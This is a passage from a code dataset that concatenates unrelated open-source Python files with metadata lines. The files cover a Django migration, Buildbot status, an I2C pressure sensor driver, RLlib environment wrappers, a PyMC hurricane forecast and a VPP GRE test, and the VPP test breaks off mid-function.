            outer_box_scale=parser_params.outer_box_scale,
            box_jitter_scale=parser_params.box_jitter_scale,
            num_sampled_masks=parser_params.num_sampled_masks,
            mask_crop_size=parser_params.mask_crop_size,
            mask_min_level=parser_params.mask_min_level,
            mask_max_level=parser_params.mask_max_level,
            upsample_factor=parser_params.upsample_factor,
            match_threshold=parser_params.match_threshold,
            unmatched_threshold=parser_params.unmatched_threshold,
            aug_rand_hflip=parser_params.aug_rand_hflip,
            aug_scale_min=parser_params.aug_scale_min,
            aug_scale_max=parser_params.aug_scale_max,
            skip_crowd_during_training=parser_params.skip_crowd_during_training,
            max_num_instances=parser_params.max_num_instances,
            use_bfloat16=params.architecture.use_bfloat16,
            mask_train_class=parser_params.mask_train_class,
            mode=mode)
    else:
        raise ValueError('Parser %s is not supported.' % params.architecture.parser)
    return parser_fn
license: apache-2.0 | hash: -2,585,703,879,675,773,000 | line_mean: 46.883495 | line_max: 80 | alpha_frac: 0.70884 | autogenerated: false | ratio: 3.6 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: CivicKnowledge/metaeditor | path: compat/tests/helpers.py | copies: 1 | size: 1050
# -*- coding: utf-8 -*-
import fudge
local_cache = {}
def patch_identifier_index(result):
    """ Patches ambry search identifier to return given result. """
    from ambry.library.search import Search

    # convert each dict in the result to the hit expected by searcher.
    class MyDict(dict):
        pass

    new_result = []
    for i, one in enumerate(result):
        my = MyDict()
        my.update(one)
        my.score = i
        new_result.append(my)

    class FakeSearcher(object):
        def search(self, query, limit=20):
            return new_result

        def __enter__(self, *args, **kwargs):
            return self

        def __exit__(self, *args, **kwargs):
            pass

    class FakeIdentifierIndex(object):
        schema = '?'

        def searcher(*args, **kwargs):
            return FakeSearcher()

    local_cache['patched_identifier_index'] = fudge.patch_object(
        Search, 'identifier_index', FakeIdentifierIndex())


def restore_patched():
    local_cache['patched_identifier_index'].restore()
license: mit | hash: -950,198,280,900,492,700 | line_mean: 22.333333 | line_max: 70 | alpha_frac: 0.598095 | autogenerated: false | ratio: 4.038462 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: rastrexando-eu/rastrexando-eu | path: core/migrations/0060_auto_20180128_1205.py | copies: 1 | size: 1505
# Generated by Django 2.0.1 on 2018-01-28 11:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    dependencies = [
        ('core', '0059_config'),
    ]

    operations = [
        migrations.AlterField(
            model_name='config',
            name='current_season',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='core.Season', verbose_name='Temporada Actual'),
        ),
        migrations.AlterField(
            model_name='medialink',
            name='rastrexo',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='media_links', to='core.Rastrexo'),
        ),
        migrations.AlterField(
            model_name='rastrexo',
            name='organization',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='rastrexos', to='core.Organization', verbose_name='Organización'),
        ),
        migrations.AlterField(
            model_name='rastrexo',
            name='season',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='rastrexos', to='core.Season'),
        ),
        migrations.AlterField(
            model_name='teammatch',
            name='rastrexo',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='team_matches', to='core.Rastrexo'),
        ),
    ]
license: gpl-3.0 | hash: -6,761,579,042,721,352,000 | line_mean: 37.564103 | line_max: 183 | alpha_frac: 0.621011 | autogenerated: false | ratio: 3.886305 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: FedoraScientific/salome-hexablock | path: doc/test_doc/make_transformation/make_scale.py | copies: 1 | size: 1308
# -*- coding: latin-1 -*-
# Copyright (C) 2009-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
####### Test make scale ###############
import hexablock
doc = hexablock.addDocument ("default")
ori = doc.addVertex ( 0, 0, 0)
vz = doc.addVector ( 0, 0, 1)
vx = doc.addVector ( 1 ,0, 0)
dr = 1
da = 360
dl = 1
nr = 1
na = 6
nl = 1
grid = doc.makeCylindrical (ori, vx,vz, dr,da,dl, nr,na,nl, False)
dest = doc.addVertex (15, 0, 0)
grid2 = doc.makeScale (grid, dest, 0.5)
##### doc .saveVtk ("make_scale.vtk")
license: lgpl-2.1 | hash: -8,208,037,687,077,105,000 | line_mean: 28.727273 | line_max: 81 | alpha_frac: 0.692661 | autogenerated: false | ratio: 3.198044 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: openstack/designate | path: designate/objects/zone_import.py | copies: 1 | size: 1570
# Copyright 2015 Rackspace Inc.
#
# Author: Tim Simmons <tim.simmons@rackspace.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from designate.objects import base
from designate.objects import fields
@base.DesignateRegistry.register
class ZoneImport(base.DictObjectMixin, base.PersistentObjectMixin,
                 base.DesignateObject):
    fields = {
        'status': fields.EnumField(nullable=True,
                                   valid_values=["ACTIVE", "PENDING",
                                                 "DELETED", "ERROR", "COMPLETE"]
                                   ),
        'task_type': fields.EnumField(nullable=True,
                                      valid_values=["IMPORT"]
                                      ),
        'tenant_id': fields.StringFields(nullable=True),
        'message': fields.StringFields(nullable=True, maxLength=160),
        'zone_id': fields.UUIDFields(nullable=True)
    }


@base.DesignateRegistry.register
class ZoneImportList(base.ListObjectMixin, base.DesignateObject,
                     base.PagedListObjectMixin):
    LIST_ITEM_TYPE = ZoneImport

    fields = {
        'objects': fields.ListOfObjectsField('ZoneImport'),
    }
license: apache-2.0 | hash: -6,399,281,235,386,972,000 | line_mean: 34.681818 | line_max: 75 | alpha_frac: 0.689809 | autogenerated: false | ratio: 4.056848 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: anish/buildbot | path: master/buildbot/status/buildrequest.py | copies: 1 | size: 4850
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.internet import defer
from twisted.python import log
from zope.interface import implementer
from buildbot import interfaces
from buildbot.util.eventual import eventually
@implementer(interfaces.IBuildRequestStatus)
class BuildRequestStatus:

    def __init__(self, buildername, brid, status, brdict=None):
        self.buildername = buildername
        self.brid = brid
        self.status = status
        self.master = status.master

        self._brdict = brdict
        self._buildrequest = None
        self._buildrequest_lock = defer.DeferredLock()

    @defer.inlineCallbacks
    def _getBuildRequest(self):
        """
        Get the underlying BuildRequest object for this status. This is a slow
        operation!

        @returns: BuildRequest instance or None, via Deferred
        """
        # late binding to avoid an import cycle
        from buildbot.process import buildrequest

        # this is only set once, so no need to lock if we already have it
        if self._buildrequest:
            return self._buildrequest

        yield self._buildrequest_lock.acquire()
        try:
            if not self._buildrequest:
                if self._brdict is None:
                    self._brdict = (
                        yield self.master.db.buildrequests.getBuildRequest(
                            self.brid))

                br = yield buildrequest.BuildRequest.fromBrdict(self.master,
                                                                self._brdict)
                self._buildrequest = br
        finally:
            self._buildrequest_lock.release()

        return self._buildrequest

    def buildStarted(self, build):
        self.status._buildrequest_buildStarted(build.status)
        self.builds.append(build.status)

    # methods called by our clients

    @defer.inlineCallbacks
    def getBsid(self):
        br = yield self._getBuildRequest()
        return br.bsid

    @defer.inlineCallbacks
    def getBuildProperties(self):
        br = yield self._getBuildRequest()
        return br.properties

    def getSourceStamp(self):
        # TODO..
        return defer.succeed(None)

    def getBuilderName(self):
        return self.buildername

    @defer.inlineCallbacks
    def getBuilds(self):
        builder = self.status.getBuilder(self.getBuilderName())
        builds = []

        bdicts = yield self.master.db.builds.getBuilds(buildrequestid=self.brid)

        buildnums = sorted([bdict['number'] for bdict in bdicts])
        for buildnum in buildnums:
            bs = builder.getBuild(buildnum)
            if bs:
                builds.append(bs)
        return builds

    def subscribe(self, observer):
        d = self.getBuilds()

        @d.addCallback
        def notify_old(oldbuilds):
            for bs in oldbuilds:
                eventually(observer, bs)
        d.addCallback(lambda _:
                      self.status._buildrequest_subscribe(self.brid, observer))
        d.addErrback(log.err, 'while notifying subscribers')

    def unsubscribe(self, observer):
        self.status._buildrequest_unsubscribe(self.brid, observer)

    @defer.inlineCallbacks
    def getSubmitTime(self):
        br = yield self._getBuildRequest()
        return br.submittedAt

    def asDict(self):
        result = {}
        # Constant
        result['source'] = None  # not available sync, sorry
        result['builderName'] = self.buildername
        result['submittedAt'] = None  # not available sync, sorry

        # Transient
        result['builds'] = []  # not available async, sorry
        return result

    @defer.inlineCallbacks
    def asDict_async(self):
        result = {}

        ss = yield self.getSourceStamp()
        result['source'] = ss.asDict()
        props = yield self.getBuildProperties()
        result['properties'] = props.asList()
        result['builderName'] = self.getBuilderName()
        result['submittedAt'] = yield self.getSubmitTime()
        builds = yield self.getBuilds()
        result['builds'] = [build.asDict() for build in builds]
        return result
license: gpl-2.0 | hash: -6,598,749,122,687,935,000 | line_mean: 30.699346 | line_max: 80 | alpha_frac: 0.632165 | autogenerated: false | ratio: 4.46593 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: rbmj/pyflightcontrol | path: pyflightcontrol/aircraft/mpl3115a2.py | copies: 1 | size: 3189
from smbus import SMBus
from sys import exit
import os
import time
class MPL3115A2(object):
    # I2C ADDRESS/BITS
    ADDRESS = (0x60)

    # REGISTERS
    REGISTER_STATUS = (0x00)
    REGISTER_STATUS_TDR = 0x02
    REGISTER_STATUS_PDR = 0x04
    REGISTER_STATUS_PTDR = 0x08

    REGISTER_PRESSURE_MSB = (0x01)
    REGISTER_PRESSURE_CSB = (0x02)
    REGISTER_PRESSURE_LSB = (0x03)

    REGISTER_TEMP_MSB = (0x04)
    REGISTER_TEMP_LSB = (0x05)

    REGISTER_DR_STATUS = (0x06)

    OUT_P_DELTA_MSB = (0x07)
    OUT_P_DELTA_CSB = (0x08)
    OUT_P_DELTA_LSB = (0x09)

    OUT_T_DELTA_MSB = (0x0A)
    OUT_T_DELTA_LSB = (0x0B)

    BAR_IN_MSB = (0x14)

    WHOAMI = (0x0C)

    # BITS
    PT_DATA_CFG = 0x13
    PT_DATA_CFG_TDEFE = 0x01
    PT_DATA_CFG_PDEFE = 0x02
    PT_DATA_CFG_DREM = 0x04

    CTRL_REG1 = (0x26)
    CTRL_REG1_SBYB = 0x01
    CTRL_REG1_OST = 0x02
    CTRL_REG1_RST = 0x04
    CTRL_REG1_OS1 = 0x00
    CTRL_REG1_OS2 = 0x08
    CTRL_REG1_OS4 = 0x10
    CTRL_REG1_OS8 = 0x18
    CTRL_REG1_OS16 = 0x20
    CTRL_REG1_OS32 = 0x28
    CTRL_REG1_OS64 = 0x30
    CTRL_REG1_OS128 = 0x38
    CTRL_REG1_RAW = 0x40
    CTRL_REG1_ALT = 0x80
    CTRL_REG1_BAR = 0x00
    CTRL_REG2 = (0x27)
    CTRL_REG3 = (0x28)
    CTRL_REG4 = (0x29)
    CTRL_REG5 = (0x2A)

    REGISTER_STARTCONVERSION = (0x12)

    def __init__(self):
        os.system('echo -n 1 > ' +
                  '/sys/module/i2c_bcm2708/parameters/combined')
        self._bus = SMBus(1)
        whoami = self._bus.read_byte_data(MPL3115A2.ADDRESS,
                                          MPL3115A2.WHOAMI)
        if whoami != 0xc4:
            raise RuntimeError('unexpected WHO_AM_I response')  # FIXME
        # Enable Event Flags
        self._bus.write_byte_data(MPL3115A2.ADDRESS,
                                  MPL3115A2.PT_DATA_CFG, 0x07)
        self.pressure = 0
        self.temperature = 0

    def poll(self):
        self._bus.read_byte_data(MPL3115A2.ADDRESS, MPL3115A2.CTRL_REG1)
        self._bus.write_byte_data(
            MPL3115A2.ADDRESS,
            MPL3115A2.CTRL_REG1,
            MPL3115A2.CTRL_REG1_OST |
            MPL3115A2.CTRL_REG1_OS8)
        while True:
            reg = self._bus.read_byte_data(MPL3115A2.ADDRESS,
                                           MPL3115A2.REGISTER_STATUS)
            if (reg & MPL3115A2.REGISTER_STATUS_PTDR) != 0:
                break
        msb, csb, lsb = self._bus.read_i2c_block_data(MPL3115A2.ADDRESS,
                                                      MPL3115A2.REGISTER_PRESSURE_MSB, 3)
        self.pressure = ((msb << 16) | (csb << 8) | lsb) / 64.
        # convert to psf
        self.pressure = self.pressure * 0.02089
        msb, lsb = self._bus.read_i2c_block_data(MPL3115A2.ADDRESS,
                                                 MPL3115A2.REGISTER_TEMP_MSB, 2)
        self.temperature = (msb << 8) | lsb
        # check sign
        if self.temperature > (1 << 15):
            self.temperature = self.temperature - (1 << 16)
        # make fractional and convert to kelvin
        self.temperature = (self.temperature / 256.) + 273.15
        # convert to rankine
        self.temperature = self.temperature * 1.8


if __name__ == '__main__':
    dev = MPL3115A2()
    while True:
        dev.poll()
        print('p {}\tT {}'.format(dev.pressure, dev.temperature))
        time.sleep(0.05)
license: apache-2.0 | hash: -4,089,819,986,893,017,600 | line_mean: 26.973684 | line_max: 72 | alpha_frac: 0.570398 | autogenerated: false | ratio: 2.633361 | config_test: false | has_no_keywords: false | few_assignments: false
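A note on the sample above: `poll()` treats the 24-bit pressure registers as a fixed-point Pascal value (divide by 64) and the 16-bit temperature as signed fixed-point Celsius (divide by 256). A self-contained sketch of the same arithmetic on invented example bytes, not values captured from a sensor:

```python
# Decode MPL3115A2 raw register bytes the same way poll() does.
# The example bytes below are invented for illustration only.
msb, csb, lsb = 0x63, 0x5E, 0x80                        # 24-bit pressure registers

pressure_pa = ((msb << 16) | (csb << 8) | lsb) / 64.0   # fixed-point -> Pascals (~101754 Pa)
pressure_psf = pressure_pa * 0.02089                    # Pa -> pounds per square foot

tmsb, tlsb = 0x19, 0x40                                 # 16-bit temperature registers
raw_t = (tmsb << 8) | tlsb
if raw_t > (1 << 15):                                   # sign-extend the 16-bit value
    raw_t -= (1 << 16)
temp_k = raw_t / 256.0 + 273.15                         # fixed-point Celsius -> Kelvin (~298.4 K)
temp_r = temp_k * 1.8                                   # Kelvin -> Rankine

print(pressure_psf, temp_r)
```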
repo_name: ray-project/ray | path: rllib/examples/env/mbmpo_env.py | copies: 1 | size: 3338
from gym.envs.classic_control import PendulumEnv, CartPoleEnv
import numpy as np
# MuJoCo may not be installed.
HalfCheetahEnv = HopperEnv = None
try:
    from gym.envs.mujoco import HalfCheetahEnv, HopperEnv
except Exception:
    pass


class CartPoleWrapper(CartPoleEnv):
    """Wrapper for the Cartpole-v0 environment.

    Adds an additional `reward` method for some model-based RL algos (e.g.
    MB-MPO).
    """

    def reward(self, obs, action, obs_next):
        # obs = batch * [pos, vel, angle, rotation_rate]
        x = obs_next[:, 0]
        theta = obs_next[:, 2]

        # 1.0 if we are still on, 0.0 if we are terminated due to bounds
        # (angular or x-axis) being breached.
        rew = 1.0 - ((x < -self.x_threshold) | (x > self.x_threshold) |
                     (theta < -self.theta_threshold_radians) |
                     (theta > self.theta_threshold_radians)).astype(np.float32)
        return rew


class PendulumWrapper(PendulumEnv):
    """Wrapper for the Pendulum-v0 environment.

    Adds an additional `reward` method for some model-based RL algos (e.g.
    MB-MPO).
    """

    def reward(self, obs, action, obs_next):
        # obs = [cos(theta), sin(theta), dtheta/dt]
        # To get the angle back from obs: atan2(sin(theta), cos(theta)).
        theta = np.arctan2(
            np.clip(obs[:, 1], -1.0, 1.0), np.clip(obs[:, 0], -1.0, 1.0))

        # Do everything in (B,) space (single theta-, action- and
        # reward values).
        a = np.clip(action, -self.max_torque, self.max_torque)[0]
        costs = self.angle_normalize(theta) ** 2 + \
            0.1 * obs[:, 2] ** 2 + 0.001 * (a ** 2)
        return -costs

    @staticmethod
    def angle_normalize(x):
        return (((x + np.pi) % (2 * np.pi)) - np.pi)


class HalfCheetahWrapper(HalfCheetahEnv or object):
    """Wrapper for the MuJoCo HalfCheetah-v2 environment.

    Adds an additional `reward` method for some model-based RL algos (e.g.
    MB-MPO).
    """

    def reward(self, obs, action, obs_next):
        if obs.ndim == 2 and action.ndim == 2:
            assert obs.shape == obs_next.shape
            forward_vel = obs_next[:, 8]
            ctrl_cost = 0.1 * np.sum(np.square(action), axis=1)
            reward = forward_vel - ctrl_cost
            return np.minimum(np.maximum(-1000.0, reward), 1000.0)
        else:
            forward_vel = obs_next[8]
            ctrl_cost = 0.1 * np.square(action).sum()
            reward = forward_vel - ctrl_cost
            return np.minimum(np.maximum(-1000.0, reward), 1000.0)


class HopperWrapper(HopperEnv or object):
    """Wrapper for the MuJoCo Hopper-v2 environment.

    Adds an additional `reward` method for some model-based RL algos (e.g.
    MB-MPO).
    """

    def reward(self, obs, action, obs_next):
        alive_bonus = 1.0
        assert obs.ndim == 2 and action.ndim == 2
        assert (obs.shape == obs_next.shape
                and action.shape[0] == obs.shape[0])
        vel = obs_next[:, 5]
        ctrl_cost = 1e-3 * np.sum(np.square(action), axis=1)
        reward = vel + alive_bonus - ctrl_cost
        return np.minimum(np.maximum(-1000.0, reward), 1000.0)


if __name__ == "__main__":
    env = PendulumWrapper()
    env.reset()
    for _ in range(100):
        env.step(env.action_space.sample())
        env.render()
license: apache-2.0 | hash: 4,605,161,927,756,585,500 | line_mean: 31.72549 | line_max: 79 | alpha_frac: 0.584182 | autogenerated: false | ratio: 3.218901 | config_test: false | has_no_keywords: false | few_assignments: false
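A note on the sample above: the wrappers exist so model-based algorithms can evaluate rewards for whole batches of imagined transitions without stepping the simulator. A quick sanity-check sketch of that batched call; shapes are inferred from the `reward()` implementations shown, and the inputs are random placeholders:

```python
import numpy as np
# Assumes PendulumWrapper from the file above is importable; gym installed.

env = PendulumWrapper()
batch = 16
obs = np.random.uniform(-1.0, 1.0, size=(batch, 3))        # [cos(theta), sin(theta), thetadot]
act = np.random.uniform(-2.0, 2.0, size=(batch, 1))
obs_next = np.random.uniform(-1.0, 1.0, size=(batch, 3))

# One vectorized call returns a (batch,) array of rewards,
# with no env.step() and no simulator state involved.
rew = env.reward(obs, act, obs_next)
assert rew.shape == (batch,)
```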
repo_name: EliAndrewC/ensconce | path: tests/unit/crypto/test_ephemeral.py | copies: 1 | size: 3398
import os
import hashlib
from ensconce.crypto import MasterKey, state, util as crypto_util
from ensconce import exc
from tests import BaseModelTest
class EphemeralStateTest(BaseModelTest):
    def setUp(self):
        super(EphemeralStateTest, self).setUp()
        # We need to reset the state
        state.secret_key = None
        #crypto_util.clear_key_metadata()

    def _set_key(self, encryption_key, signing_key):
        """
        Sets a key on the ephemeral store; this method also takes care of
        setting up the key metadata (otherwise loading mismatched key will fail).
        """
        state.secret_key = None
        key = MasterKey(encryption_key=encryption_key, signing_key=signing_key)
        crypto_util.initialize_key_metadata(key=key, salt=os.urandom(8), force_overwrite=True)
        state.secret_key = key

    def tearDown(self):
        # Remove key_metadata rows so that they can be re-initialized.
        super(EphemeralStateTest, self).tearDown()
        crypto_util.initialize_key_metadata(key=self.SECRET_KEY, salt=os.urandom(8), force_overwrite=True)

    def test_initialized(self):
        """ Test ephemeral state initialization check. """
        self.assertFalse(state.initialized)
        self._set_key(hashlib.sha256('secret').digest(), hashlib.sha256('sign').digest())
        self.assertTrue(state.initialized)

    def test_access_uninitialized(self):
        """ Test accessing uninitialized secret_key """
        state.secret_key = None
        with self.assertRaises(exc.CryptoNotInitialized):
            state.secret_key

    def test_already_initialized(self):
        """ Test already-initialized ephemeral state key setting. """
        self._set_key(hashlib.sha256('secret').digest(), hashlib.sha256('sign').digest())
        ekey = hashlib.sha256('secret').digest()
        skey = hashlib.sha256('sign').digest()
        state.secret_key = MasterKey(ekey, skey)

    def test_set_different_key(self):
        """ Ensure that setting a new encryption key fails validation. """
        state.secret_key = None
        ekey = hashlib.sha256('new-key').digest()
        skey = hashlib.sha256('new-key').digest()
        with self.assertRaises(exc.IncorrectKey):
            state.secret_key = MasterKey(ekey, skey)

    def test_set_different_signing_key(self):
        """ Ensure that setting a new signing key fails validation. """
        self._set_key(hashlib.sha256('secret').digest(), hashlib.sha256('sign').digest())
        ekey = hashlib.sha256('secret').digest()
        skey = hashlib.sha256('new-key').digest()
        with self.assertRaises(exc.IncorrectKey):
            state.secret_key = MasterKey(ekey, skey)

    def test_set_incorrect_size(self):
        """ Test setting an incorrect sized key. """
        # We only support 32-char keys.
        with self.assertRaises(ValueError):
            state.secret_key = ""
        with self.assertRaises(ValueError):
            state.secret_key = hashlib.sha384('secret').digest()
        with self.assertRaises(ValueError):
            state.secret_key = hashlib.sha1().digest()

    def test_set_incorrect_type(self):
        """ Test setting with incorrect type. """
        with self.assertRaises(TypeError):
            state.secret_key = hashlib.sha1()
license: bsd-3-clause | hash: 6,698,764,096,634,126,000 | line_mean: 39.464286 | line_max: 106 | alpha_frac: 0.628605 | autogenerated: false | ratio: 4.195062 | config_test: true | has_no_keywords: false | few_assignments: false
repo_name: jkominek/scicasting | path: hurricanes/firststorm.py | copies: 1 | size: 2737
#!/usr/bin/python
from datetime import datetime, date, timedelta
from pymc import *
import numpy as np
dates = [date(1992, 4, 21),
         date(1993, 5, 31),
         date(1994, 6, 30),
         date(1995, 6, 2),
         date(1996, 6, 17),
         date(1997, 6, 1),
         date(1998, 7, 27),
         date(1999, 6, 11),
         date(2000, 6, 7),
         date(2001, 6, 4),
         date(2002, 7, 14),
         date(2003, 4, 20),
         date(2004, 7, 31),
         date(2005, 6, 8),
         date(2006, 6, 10),
         date(2007, 5, 9),
         date(2008, 5, 31),
         date(2009, 5, 28),
         date(2010, 6, 25),
         date(2011, 6, 28),
         date(2012, 5, 19),
         date(2013, 6, 5)]

relative_days = []
for d in dates:
    end_of_june = date(d.year, 6, 30)
    relative_days.append((d - end_of_june).days)

days_array = np.array(relative_days)

simple_mean = np.mean(days_array)
simple_stddev = np.std(days_array)

def predict(today, FORECAST_CLEAR):
    days_mean = Uniform('days_mean', lower=-90, upper=90)
    days_tau = Uniform('days_tau', upper=1.0, lower=1.0/(simple_stddev*2)**2,
                       value=1.0/simple_stddev**2)
    days = Normal('days', mu=days_mean, tau=days_tau,
                  value=days_array, observed=True)
    next_year = Normal('next_year', mu=days_mean, tau=days_tau)

    end_of_june = date(today.year, 6, 30)
    today = (today - end_of_june).days

    @deterministic()
    def before_july(next_year=next_year):
        return next_year <= 0

    @potential()
    def not_before_today(next_year=next_year):
        if next_year <= (today + FORECAST_CLEAR):
            return -1e10
        else:
            return 0.0

    model = Model([not_before_today, before_july, days, days_mean, days_tau])
    M = MCMC(model)
    M.sample(iter=70000, burn=10000, verbose=0, progress_bar=False)
    return M

# http://www.nhc.noaa.gov/
# True if there is nothing with 48-hour formation
# potential on the map
FORECAST_48_HOUR_CLEAR = False

M = predict(date.today(), 2 if FORECAST_48_HOUR_CLEAR else 0)
print "Today"
print np.mean(M.trace('before_july')[:])

M = predict(date.today()+timedelta(1), 1.5 if FORECAST_48_HOUR_CLEAR else 0)
print "Tomorrow"
print np.mean(M.trace('before_july')[:])

M = predict(date.today()+timedelta(2), 0.25 if FORECAST_48_HOUR_CLEAR else 0)
print "2 days from now"
print np.mean(M.trace('before_july')[:])

M = predict(date.today()+timedelta(3), 0.0 if FORECAST_48_HOUR_CLEAR else 0)
print "3 days from now"
print np.mean(M.trace('before_july')[:])

M = predict(date.today()+timedelta(4), 0.0 if FORECAST_48_HOUR_CLEAR else 0)
print "4 days from now"
print np.mean(M.trace('before_july')[:])
license: isc | hash: 4,998,649,028,677,647,000 | line_mean: 28.117021 | line_max: 77 | alpha_frac: 0.583851 | autogenerated: false | ratio: 2.896296 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: jacobian-archive/python-hdcloud | path: hdcloud/client.py | copies: 1 | size: 1893
import httplib2
import urlparse
import urllib
import hdcloud
from . import exceptions
try:
    import json
except ImportError:
    import simplejson as json


class HDCloudClient(httplib2.Http):
    USER_AGENT = 'python-hdcloud/%s' % hdcloud.__version__
    BASE_URL = 'http://hdcloud.com/api/v1/'

    def __init__(self, username, password):
        super(HDCloudClient, self).__init__()
        self.add_credentials(username, password)
        self.force_exception_to_status_code = True

    def request(self, url, method, *args, **kwargs):
        url = urlparse.urljoin(self.BASE_URL, url.lstrip('/'))

        # Make sure to hardcode requests for JSON
        scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
        path = "%s.json" % path
        url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))

        # Add User-Agent headers
        kwargs.setdefault('headers', {})
        kwargs['headers']['User-Agent'] = self.USER_AGENT

        resp, body = self._hdc_request(url, method, *args, **kwargs)

        if resp.status in (400, 401, 403, 404, 406, 413, 500):
            raise exceptions.from_response(resp, body)

        return resp, body

    def _hdc_request(self, url, method, *args, **kwargs):
        # Separate method for mocking and testing.
        resp, body = super(HDCloudClient, self).request(url, method, *args, **kwargs)
        body = json.loads(body) if body else None
        return resp, body

    def get(self, url, **kwargs):
        return self.request(url, 'GET', **kwargs)

    def post(self, url, **kwargs):
        return self.request(url, 'POST', **kwargs)

    def put(self, url, **kwargs):
        return self.request(url, 'PUT', **kwargs)

    def delete(self, url, **kwargs):
        return self.request(url, 'DELETE', **kwargs)
license: bsd-3-clause | hash: -7,586,979,735,969,499,000 | line_mean: 33.210526 | line_max: 85 | alpha_frac: 0.595351 | autogenerated: false | ratio: 3.903093 | config_test: false | has_no_keywords: false | few_assignments: false
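A note on the sample above: every request is rewritten to a `.json` path under `BASE_URL`, tagged with the client's User-Agent, and its response body JSON-decoded before being returned. A hedged usage sketch; the `/stores` resource path is invented for illustration, not a documented endpoint:

```python
# Hypothetical usage of HDCloudClient; the endpoint path is illustrative only.
client = HDCloudClient('user@example.com', 's3cret')

# Issues GET http://hdcloud.com/api/v1/stores.json with basic auth and the
# client's User-Agent header; body comes back already JSON-decoded.
resp, body = client.get('/stores')
print(resp.status, body)
```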
repo_name: licko/vpp-1701-licko | path: test/test_gre.py | copies: 1 | size: 23296
#!/usr/bin/env python
import unittest
from logging import *
from framework import VppTestCase, VppTestRunner
from vpp_sub_interface import VppDot1QSubint
from vpp_gre_interface import VppGreInterface
from vpp_ip_route import IpRoute, RoutePath
from vpp_papi_provider import L2_VTR_OP
from scapy.packet import Raw
from scapy.layers.l2 import Ether, Dot1Q, GRE
from scapy.layers.inet import IP, UDP
from scapy.layers.inet6 import IPv6
from scapy.volatile import RandMAC, RandIP
from util import ppp, ppc
class TestGRE(VppTestCase):
    """ GRE Test Case """

    @classmethod
    def setUpClass(cls):
        super(TestGRE, cls).setUpClass()

    def setUp(self):
        super(TestGRE, self).setUp()

        # create 2 pg interfaces - set one in a non-default table.
        self.create_pg_interfaces(range(2))
        self.pg1.set_table_ip4(1)

        for i in self.pg_interfaces:
            i.admin_up()
            i.config_ip4()
            i.resolve_arp()

    def tearDown(self):
        super(TestGRE, self).tearDown()

    def create_stream_ip4(self, src_if, src_ip, dst_ip):
        pkts = []
        for i in range(0, 257):
            info = self.create_packet_info(src_if.sw_if_index,
                                           src_if.sw_if_index)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IP(src=src_ip, dst=dst_ip) /
                 UDP(sport=1234, dport=1234) /
                 Raw(payload))
            info.data = p.copy()
            pkts.append(p)
        return pkts

    def create_tunnel_stream_4o4(self, src_if,
                                 tunnel_src, tunnel_dst,
                                 src_ip, dst_ip):
        pkts = []
        for i in range(0, 257):
            info = self.create_packet_info(src_if.sw_if_index,
                                           src_if.sw_if_index)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IP(src=tunnel_src, dst=tunnel_dst) /
                 GRE() /
                 IP(src=src_ip, dst=dst_ip) /
                 UDP(sport=1234, dport=1234) /
                 Raw(payload))
            info.data = p.copy()
            pkts.append(p)
        return pkts

    def create_tunnel_stream_6o4(self, src_if,
                                 tunnel_src, tunnel_dst,
                                 src_ip, dst_ip):
        pkts = []
        for i in range(0, 257):
            info = self.create_packet_info(src_if.sw_if_index,
                                           src_if.sw_if_index)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IP(src=tunnel_src, dst=tunnel_dst) /
                 GRE() /
                 IPv6(src=src_ip, dst=dst_ip) /
                 UDP(sport=1234, dport=1234) /
                 Raw(payload))
            info.data = p.copy()
            pkts.append(p)
        return pkts

    def create_tunnel_stream_l2o4(self, src_if,
                                  tunnel_src, tunnel_dst):
        pkts = []
        for i in range(0, 257):
            info = self.create_packet_info(src_if.sw_if_index,
                                           src_if.sw_if_index)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IP(src=tunnel_src, dst=tunnel_dst) /
                 GRE() /
                 Ether(dst=RandMAC('*:*:*:*:*:*'),
